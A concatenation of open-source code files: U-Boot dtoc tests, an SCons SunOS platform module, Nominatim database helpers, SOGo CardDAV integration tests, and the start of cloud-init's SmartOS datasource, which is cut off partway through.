struct dtd_target {
\tfdt32_t\t\tintval;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle2-target index 0 */
static struct dtd_target dtv_phandle2_target = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(phandle2_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle2_target,
\t.platdata_size\t= sizeof(dtv_phandle2_target),
\t.parent_idx\t= -1,
};
/* Node /phandle3-target index 1 */
static struct dtd_target dtv_phandle3_target = {
\t.intval\t\t\t= 0x2,
};
U_BOOT_DEVICE(phandle3_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle3_target,
\t.platdata_size\t= sizeof(dtv_phandle3_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-target index 4 */
static struct dtd_target dtv_phandle_target = {
\t.intval\t\t\t= 0x0,
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source index 2 */
static struct dtd_source dtv_phandle_source = {
\t.clocks\t\t\t= {
\t\t\t{4, {}},
\t\t\t{0, {11}},
\t\t\t{1, {12, 13}},
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source,
\t.platdata_size\t= sizeof(dtv_phandle_source),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 3 */
static struct dtd_source dtv_phandle_source2 = {
\t.clocks\t\t\t= {
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_single(self):
"""Test output from a node containing a phandle reference"""
dtb_file = get_dtb_file('dtoc_test_phandle_single.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_source {
\tstruct phandle_0_arg clocks[1];
};
struct dtd_target {
\tfdt32_t\t\tintval;
};
''', data)
def test_phandle_reorder(self):
"""Test that phandle targets are generated before their references"""
dtb_file = get_dtb_file('dtoc_test_phandle_reorder.dts')
output = tools.GetOutputFilename('output')
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle-target index 1 */
static struct dtd_target dtv_phandle_target = {
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 0 */
static struct dtd_source dtv_phandle_source2 = {
\t.clocks\t\t\t= {
\t\t\t{1, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_cd_gpio(self):
"""Test that phandle targets are generated when unsing cd-gpios"""
dtb_file = get_dtb_file('dtoc_test_phandle_cd_gpios.dts')
output = tools.GetOutputFilename('output')
dtb_platdata.run_steps(['platdata'], dtb_file, False, output, True)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /phandle2-target index 0 */
static struct dtd_target dtv_phandle2_target = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(phandle2_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle2_target,
\t.platdata_size\t= sizeof(dtv_phandle2_target),
\t.parent_idx\t= -1,
};
/* Node /phandle3-target index 1 */
static struct dtd_target dtv_phandle3_target = {
\t.intval\t\t\t= 0x2,
};
U_BOOT_DEVICE(phandle3_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle3_target,
\t.platdata_size\t= sizeof(dtv_phandle3_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-target index 4 */
static struct dtd_target dtv_phandle_target = {
\t.intval\t\t\t= 0x0,
};
U_BOOT_DEVICE(phandle_target) = {
\t.name\t\t= "target",
\t.platdata\t= &dtv_phandle_target,
\t.platdata_size\t= sizeof(dtv_phandle_target),
\t.parent_idx\t= -1,
};
/* Node /phandle-source index 2 */
static struct dtd_source dtv_phandle_source = {
\t.cd_gpios\t\t= {
\t\t\t{4, {}},
\t\t\t{0, {11}},
\t\t\t{1, {12, 13}},
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source,
\t.platdata_size\t= sizeof(dtv_phandle_source),
\t.parent_idx\t= -1,
};
/* Node /phandle-source2 index 3 */
static struct dtd_source dtv_phandle_source2 = {
\t.cd_gpios\t\t= {
\t\t\t{4, {}},},
};
U_BOOT_DEVICE(phandle_source2) = {
\t.name\t\t= "source",
\t.platdata\t= &dtv_phandle_source2,
\t.platdata_size\t= sizeof(dtv_phandle_source2),
\t.parent_idx\t= -1,
};
void dm_populate_phandle_data(void) {
}
''', data)
def test_phandle_bad(self):
"""Test a node containing an invalid phandle fails"""
dtb_file = get_dtb_file('dtoc_test_phandle_bad.dts',
capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Cannot parse 'clocks' in node 'phandle-source'",
str(e.exception))
def test_phandle_bad2(self):
"""Test a phandle target missing its #*-cells property"""
dtb_file = get_dtb_file('dtoc_test_phandle_bad2.dts',
capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'phandle-target' has no cells property",
str(e.exception))
def test_addresses64(self):
"""Test output from a node with a 'reg' property with na=2, ns=2"""
dtb_file = get_dtb_file('dtoc_test_addr64.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x1234567890123456, 0x9876543210987654},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x1234567890123456, 0x9876543210987654, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses32(self):
"""Test output from a node with a 'reg' property with na=1, ns=1"""
dtb_file = get_dtb_file('dtoc_test_addr32.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt32_t\t\treg[2];
};
struct dtd_test2 {
\tfdt32_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x12345678, 0x98765432, 0x2, 0x3},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses64_32(self):
"""Test output from a node with a 'reg' property with na=2, ns=1"""
dtb_file = get_dtb_file('dtoc_test_addr64_32.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x123400000000, 0x5678},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x1234567890123456, 0x98765432},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x1234567890123456, 0x98765432, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_addresses32_64(self):
"""Test output from a node with a 'reg' property with na=1, ns=2"""
dtb_file = get_dtb_file('dtoc_test_addr32_64.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_test1 {
\tfdt64_t\t\treg[2];
};
struct dtd_test2 {
\tfdt64_t\t\treg[2];
};
struct dtd_test3 {
\tfdt64_t\t\treg[4];
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /test1 index 0 */
static struct dtd_test1 dtv_test1 = {
\t.reg\t\t\t= {0x1234, 0x567800000000},
};
U_BOOT_DEVICE(test1) = {
\t.name\t\t= "test1",
\t.platdata\t= &dtv_test1,
\t.platdata_size\t= sizeof(dtv_test1),
\t.parent_idx\t= -1,
};
/* Node /test2 index 1 */
static struct dtd_test2 dtv_test2 = {
\t.reg\t\t\t= {0x12345678, 0x9876543210987654},
};
U_BOOT_DEVICE(test2) = {
\t.name\t\t= "test2",
\t.platdata\t= &dtv_test2,
\t.platdata_size\t= sizeof(dtv_test2),
\t.parent_idx\t= -1,
};
/* Node /test3 index 2 */
static struct dtd_test3 dtv_test3 = {
\t.reg\t\t\t= {0x12345678, 0x9876543210987654, 0x2, 0x3},
};
U_BOOT_DEVICE(test3) = {
\t.name\t\t= "test3",
\t.platdata\t= &dtv_test3,
\t.platdata_size\t= sizeof(dtv_test3),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def test_bad_reg(self):
"""Test that a reg property with an invalid type generates an error"""
# Capture stderr since dtc will emit warnings for this file
dtb_file = get_dtb_file('dtoc_test_bad_reg.dts', capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'spl-test' reg property is not an int",
str(e.exception))
def test_bad_reg2(self):
"""Test that a reg property with an invalid cell count is detected"""
# Capture stderr since dtc will emit warnings for this file
dtb_file = get_dtb_file('dtoc_test_bad_reg2.dts', capture_stderr=True)
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['struct'], dtb_file, output)
self.assertIn("Node 'spl-test' reg property has 3 cells which is not a multiple of na + ns = 1 + 1)",
str(e.exception))
def test_add_prop(self):
"""Test that a subequent node can add a new property to a struct"""
dtb_file = get_dtb_file('dtoc_test_add_prop.dts')
output = tools.GetOutputFilename('output')
self.run_test(['struct'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(HEADER + '''
struct dtd_sandbox_spl_test {
\tfdt32_t\t\tintarray;
\tfdt32_t\t\tintval;
};
''', data)
self.run_test(['platdata'], dtb_file, output)
with open(output) as infile:
data = infile.read()
self._CheckStrings(C_HEADER + '''
/* Node /spl-test index 0 */
static struct dtd_sandbox_spl_test dtv_spl_test = {
\t.intval\t\t\t= 0x1,
};
U_BOOT_DEVICE(spl_test) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test,
\t.platdata_size\t= sizeof(dtv_spl_test),
\t.parent_idx\t= -1,
};
/* Node /spl-test2 index 1 */
static struct dtd_sandbox_spl_test dtv_spl_test2 = {
\t.intarray\t\t= 0x5,
};
U_BOOT_DEVICE(spl_test2) = {
\t.name\t\t= "sandbox_spl_test",
\t.platdata\t= &dtv_spl_test2,
\t.platdata_size\t= sizeof(dtv_spl_test2),
\t.parent_idx\t= -1,
};
''' + C_EMPTY_POPULATE_PHANDLE_DATA, data)
def testStdout(self):
"""Test output to stdout"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
with test_util.capture_sys_output() as (stdout, stderr):
self.run_test(['struct'], dtb_file, '-')
def testNoCommand(self):
"""Test running dtoc without a command"""
with self.assertRaises(ValueError) as e:
self.run_test([], '', '')
self.assertIn("Please specify a command: struct, platdata",
str(e.exception))
def testBadCommand(self):
"""Test running dtoc with an invalid command"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
with self.assertRaises(ValueError) as e:
self.run_test(['invalid-cmd'], dtb_file, output)
self.assertIn("Unknown command 'invalid-cmd': (use: struct, platdata)",
str(e.exception))
def testScanDrivers(self):
"""Test running dtoc with additional drivers to scan"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output, True,
[None, '', 'tools/dtoc/dtoc_test_scan_drivers.cxx'])
def testUnicodeError(self):
"""Test running dtoc with an invalid unicode file
To be able to perform this test without adding a weird text file which
would produce issues when using checkpatch.pl or patman, generate the
file at runtime and then process it.
"""
dtb_file = get_dtb_file('dtoc_test_simple.dts')
output = tools.GetOutputFilename('output')
driver_fn = '/tmp/' + next(tempfile._get_candidate_names())
with open(driver_fn, 'wb+') as df:
df.write(b'\x81')
with test_util.capture_sys_output() as (stdout, stderr):
dtb_platdata.run_steps(['struct'], dtb_file, False, output, True,
[driver_fn])
|
Digilent/u-boot-digilent
|
tools/dtoc/test_dtoc.py
|
Python
|
gpl-2.0
| 28,025
|
"""engine.SCons.Platform.sunos
Platform-specific initialization for Sun systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001 - 2016 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Platform/sunos.py rel_2.5.0:3543:937e55cd78f7 2016/04/09 11:29:54 bdbaddog"
import posix
def generate(env):
posix.generate(env)
# Based on sunSparc 8:32bit
# ARG_MAX=1048320 - 3000 for environment expansion
env['MAXLINELENGTH'] = 1045320
env['PKGINFO'] = 'pkginfo'
env['PKGCHK'] = '/usr/sbin/pkgchk'
env['ENV']['PATH'] = env['ENV']['PATH'] + ':/opt/SUNWspro/bin:/usr/ccs/bin'
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
xiaohaidao007/pandoraBox-SDK-mt7620
|
staging_dir/host/lib/scons-2.5.0/SCons/Platform/sunos.py
|
Python
|
gpl-2.0
| 1,912
|
"""
Helper functions for handling DB accesses.
"""
import subprocess
import logging
import gzip
import io
from nominatim.db.connection import get_pg_env
from nominatim.errors import UsageError
LOG = logging.getLogger()
def _pipe_to_proc(proc, fdesc):
chunk = fdesc.read(2048)
while chunk and proc.poll() is None:
try:
proc.stdin.write(chunk)
except BrokenPipeError as exc:
raise UsageError("Failed to execute SQL file.") from exc
chunk = fdesc.read(2048)
return len(chunk)
def execute_file(dsn, fname, ignore_errors=False, pre_code=None, post_code=None):
""" Read an SQL file and run its contents against the given database
using psql. Use `pre_code` and `post_code` to run extra commands
before or after executing the file. The commands are run within the
same session, so they may be used to wrap the file execution in a
transaction.
"""
cmd = ['psql']
if not ignore_errors:
cmd.extend(('-v', 'ON_ERROR_STOP=1'))
if not LOG.isEnabledFor(logging.INFO):
cmd.append('--quiet')
proc = subprocess.Popen(cmd, env=get_pg_env(dsn), stdin=subprocess.PIPE)
try:
if not LOG.isEnabledFor(logging.INFO):
proc.stdin.write('set client_min_messages to WARNING;'.encode('utf-8'))
if pre_code:
proc.stdin.write((pre_code + ';').encode('utf-8'))
if fname.suffix == '.gz':
with gzip.open(str(fname), 'rb') as fdesc:
remain = _pipe_to_proc(proc, fdesc)
else:
with fname.open('rb') as fdesc:
remain = _pipe_to_proc(proc, fdesc)
if remain == 0 and post_code:
proc.stdin.write((';' + post_code).encode('utf-8'))
finally:
proc.stdin.close()
ret = proc.wait()
if ret != 0 or remain > 0:
raise UsageError("Failed to execute SQL file.")
# List of characters that need to be quoted for the copy command.
_SQL_TRANSLATION = {ord(u'\\'): u'\\\\',
ord(u'\t'): u'\\t',
ord(u'\n'): u'\\n'}
class CopyBuffer:
""" Data collector for the copy_from command.
"""
def __init__(self):
self.buffer = io.StringIO()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.buffer is not None:
self.buffer.close()
def add(self, *data):
""" Add another row of data to the copy buffer.
"""
first = True
for column in data:
if first:
first = False
else:
self.buffer.write('\t')
if column is None:
self.buffer.write('\\N')
else:
self.buffer.write(str(column).translate(_SQL_TRANSLATION))
self.buffer.write('\n')
def copy_out(self, cur, table, columns=None):
""" Copy all collected data into the given table.
"""
if self.buffer.tell() > 0:
self.buffer.seek(0)
cur.copy_from(self.buffer, table, columns=columns)
|
lonvia/Nominatim
|
nominatim/db/utils.py
|
Python
|
gpl-2.0
| 3,126
|
#!/usr/bin/python
from config import hostname, port, username, password
import carddav
import sogotests
import unittest
import webdavlib
import time
class JsonDavEventTests(unittest.TestCase):
def setUp(self):
self._connect_as_user()
def _connect_as_user(self, newuser=username, newpassword=password):
self.dv = carddav.Carddav(newuser, newpassword)
def _create_new_event(self, path):
gid = self.dv.newguid(path)
event = {'startDate': "2015-12-25",
'startTime': "10:00",
'endDate': "2015-12-25",
'endTime': "23:00",
'isTransparent': 0,
'sendAppointmentNotifications': 0,
'summary': "Big party",
'alarm': {'action': 'display',
'quantity': 10,
'unit': "MINUTES",
'reference': "BEFORE",
'relation': "START",
'email': "sogo1@example.com"},
'organizer': {'name': u"Balthazar C\xe9sar",
'email': "sogo2@example.com"},
'c_name': gid,
'c_folder': path
}
return (event, path, gid)
def _get_dav_data(self, filename, user=username, passwd=password):
w = webdavlib.WebDAVClient(hostname, port, user, passwd)
query = webdavlib.HTTPGET("http://localhost/SOGo/dav/%s/Calendar/personal/%s" % (username, filename))
w.execute(query)
self.assertEquals(query.response['status'], 200)
return query.response['body'].split("\r\n")
def _get_dav_field(self, davdata, fieldname):
try:
data = [a.split(':')[1] for a in davdata if fieldname in a][0]
except IndexError:
data = ''
return data
def test_create_new_event(self):
path = 'Calendar/personal'
(event, folder, gid) = self._create_new_event(path)
#print "Saving Event to:", folder, gid
self.dv.save_event(event, folder, gid)
#- Get the event back with JSON
self._connect_as_user()
self.dv.load_events()
elist = [e for e in self.dv.events if e['c_name'] == gid]
#- MUST have this event -- only once
self.assertEquals(len(elist), 1)
strdate = "%d-%.02d-%.02d" % time.gmtime(elist[0]['c_startdate'])[0:3]
self.assertEquals(strdate, event['startDate'])
#- Get the event back with DAV
dav = self._get_dav_data(gid, username, password)
self.assertEquals(self._get_dav_field(dav, 'SUMMARY:'), event['summary'])
class JsonDavPhoneTests(unittest.TestCase):
def setUp(self):
self._connect_as_user()
self.newphone = [{'type': 'home', 'value': '123.456.7890'}]
self.newphones_difftype = [{'type': 'home', 'value': '123.456.7890'},
{'type': 'work', 'value': '987.654.3210'},
{'type': 'fax', 'value': '555.666.7777'}]
self.newphones_sametype = [{'type': 'work', 'value': '123.456.7890'},
{'type': 'work', 'value': '987.654.3210'}]
# Easier to erase them all in tearDown
self.allphones = list(self.newphone)
self.allphones.extend(self.newphones_difftype)
self.allphones.extend(self.newphones_sametype)
#- In case there are no cards for this user
try:
self._get_card()
except IndexError:
path = 'Contacts/personal'
(card, path, gid) = self._create_new_card(path)
self._save_card(card)
def tearDown(self):
self._connect_as_user()
self._get_card()
#- Remove the phones we just added
for phone in self.allphones:
try:
self.card['phones'].pop(self.card['phones'].index(phone))
except ValueError:
#print "Can't find", phone
pass
self._save_card()
def _connect_as_user(self, newuser=username, newpassword=password):
self.dv = carddav.Carddav(newuser, newpassword)
def _create_new_card(self, path):
gid = self.dv.newguid(path)
card = {'c_categories': None,
'c_cn': 'John Doe',
'c_component': 'vcard',
'c_givenname': 'John Doe',
'c_mail': 'johndoe@nothere.com',
'c_name': gid,
'c_o': '',
'c_screenname': '',
'c_sn': '',
'c_telephonenumber': '123.456.7890',
'emails': [{'type': 'pref', 'value': 'johndoe@nothere.com'}],
'phones': [{'type': 'home', 'value': '111.222.3333'}],
'id': gid}
return (card, path, gid)
def _get_card(self, name="John Doe"):
tmp_card = self.dv.get_cards(name)[0]
self.card = self.dv.get_card(tmp_card['c_name'])
def _save_card(self, card=None):
if card:
self.dv.save_card(card)
else:
self.dv.save_card(self.card)
def _get_dav_data(self, filename, user=username, passwd=password):
w = webdavlib.WebDAVClient(hostname, port, user, passwd)
query = webdavlib.HTTPGET("http://localhost/SOGo/dav/%s/Contacts/personal/%s" % (username, filename))
w.execute(query)
self.assertEquals(query.response['status'], 200)
return query.response['body'].split("\r\n")
def _phone_to_dav_str(self, phonedict):
return "TEL;TYPE=%s:%s" % (phonedict['type'], phonedict['value'])
def _testMultiplePhones(self, phones):
""" Add Multiple Phones to Contact JSON and verify with DAV """
#- Use JSON to get CARD and add a phone and save it back
self._get_card()
oldphones = self.card['phones']
oldphones.extend(phones)
self._save_card()
#- Make sure that the phone is there when using JSON
self._connect_as_user()
self._get_card()
#print "C:::", self.card
testphones = self.card['phones']
#print "P1:", oldphones
#print "P2:", testphones
self.assertEquals(sorted(oldphones), sorted(testphones))
#- Verify that DAV has the same values
dav = self._get_dav_data(self.card['id'], username, password)
for phone in phones:
found = dav.index(self._phone_to_dav_str(phone))
self.assertTrue(found > 0)
def testSinglePhone(self):
self._testMultiplePhones(self.newphone)
def testMultipleDifferentPhones(self):
self._testMultiplePhones(self.newphones_difftype)
def testMultipleSameTypePhones(self):
self._testMultiplePhones(self.newphones_sametype)
if __name__ == "__main__":
sogotests.runTests()
|
saydulk/sogo
|
Tests/Integration/test-carddav.py
|
Python
|
gpl-2.0
| 6,859
|
# vi: ts=4 expandtab
#
# Copyright (C) 2013 Canonical Ltd.
#
# Author: Ben Howard <ben.howard@canonical.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
# Datasource for provisioning on SmartOS. This works on Joyent
# and public/private Clouds using SmartOS.
#
# SmartOS hosts use a serial console (/dev/ttyS1) on KVM Linux Guests
# The meta-data is transmitted via key/value pairs made by
# requests on the console. For example, to get the hostname, you
# would send "GET hostname" on /dev/ttyS1.
# For Linux Guests running in LX-Brand Zones on SmartOS hosts
# a socket (/native/.zonecontrol/metadata.sock) is used instead
# of a serial console.
#
# Certain behavior is defined by the DataDictionary
# http://us-east.manta.joyent.com/jmc/public/mdata/datadict.html
# Comments with "@datadictionary" are snippets of the definition
import base64
import binascii
import json
import os
import random
import re
import socket
from cloudinit import log as logging
from cloudinit import serial
from cloudinit import sources
from cloudinit import util
LOG = logging.getLogger(__name__)
SMARTOS_ATTRIB_MAP = {
# Cloud-init Key : (SmartOS Key, Strip line endings)
'instance-id': ('sdc:uuid', True),
'local-hostname': ('hostname', True),
'public-keys': ('root_authorized_keys', True),
'user-script': ('user-script', False),
'legacy-user-data': ('user-data', False),
'user-data': ('cloud-init:user-data', False),
'iptables_disable': ('iptables_disable', True),
'motd_sys_info': ('motd_sys_info', True),
'availability_zone': ('sdc:datacenter_name', True),
'vendor-data': ('sdc:vendor-data', False),
'operator-script': ('sdc:operator-script', False),
'hostname': ('sdc:hostname', True),
'dns_domain': ('sdc:dns_domain', True),
}
SMARTOS_ATTRIB_JSON = {
# Cloud-init Key : (SmartOS Key known JSON)
'network-data': 'sdc:nics',
'dns_servers': 'sdc:resolvers',
'routes': 'sdc:routes',
}
SMARTOS_ENV_LX_BRAND = "lx-brand"
SMARTOS_ENV_KVM = "kvm"
DS_NAME = 'SmartOS'
DS_CFG_PATH = ['datasource', DS_NAME]
NO_BASE64_DECODE = [
'iptables_disable',
'motd_sys_info',
'root_authorized_keys',
'sdc:datacenter_name',
'sdc:uuid'
'user-data',
'user-script',
]
METADATA_SOCKFILE = '/native/.zonecontrol/metadata.sock'
SERIAL_DEVICE = '/dev/ttyS1'
SERIAL_TIMEOUT = 60
# BUILT-IN DATASOURCE CONFIGURATION
# The following is the built-in configuration. If the values
# are not set via the system configuration, then these default
# will be used:
# serial_device: which serial device to use for the meta-data
# serial_timeout: how long to wait on the device
# no_base64_decode: values which are not base64 encoded and
# are fetched directly from SmartOS, not meta-data values
# base64_keys: meta-data keys that are delivered in base64
# base64_all: with the exclusion of no_base64_decode values,
# treat all meta-data as base64 encoded
# disk_setup: describes how to partition the ephemeral drive
# fs_setup: describes how to format the ephemeral drive
#
BUILTIN_DS_CONFIG = {
'serial_device': SERIAL_DEVICE,
'serial_timeout': SERIAL_TIMEOUT,
'metadata_sockfile': METADATA_SOCKFILE,
'no_base64_decode': NO_BASE64_DECODE,
'base64_keys': [],
'base64_all': False,
'disk_aliases': {'ephemeral0': '/dev/vdb'},
}
BUILTIN_CLOUD_CONFIG = {
'disk_setup': {
'ephemeral0': {'table_type': 'mbr',
'layout': False,
'overwrite': False}
},
'fs_setup': [{'label': 'ephemeral0',
'filesystem': 'ext3',
'device': 'ephemeral0'}],
}
# builtin vendor-data is a boothook that writes a script into
# /var/lib/cloud/scripts/per-boot. *That* script then handles
# executing the 'operator-script' and 'user-script' files
# that cloud-init writes into /var/lib/cloud/instance/data/
# if they exist.
#
# This is all very indirect, but its done like this so that at
# some point in the future, perhaps cloud-init wouldn't do it at
# all, but rather the vendor actually provide vendor-data that accomplished
# their desires. (That is the point of vendor-data).
#
# cloud-init does cheat a bit, and write the operator-script and user-script
# itself. It could have the vendor-script do that, but it seems better
# to not require the image to contain a tool (mdata-get) to read those
# keys when we have a perfectly good one inside cloud-init.
BUILTIN_VENDOR_DATA = """\
#cloud-boothook
#!/bin/sh
fname="%(per_boot_d)s/01_smartos_vendor_data.sh"
mkdir -p "${fname%%/*}"
cat > "$fname" <<"END_SCRIPT"
#!/bin/sh
##
# This file is written as part of the default vendor data for SmartOS.
# The SmartOS datasource writes the listed file from the listed metadata key
# sdc:operator-script -> %(operator_script)s
# user-script -> %(user_script)s
#
# You can view content with 'mdata-get <key>'
#
for script in "%(operator_script)s" "%(user_script)s"; do
[ -x "$script" ] || continue
echo "executing '$script'" 1>&2
"$script"
done
END_SCRIPT
chmod +x "$fname"
"""
# @datadictionary: this is legacy path for placing files from metadata
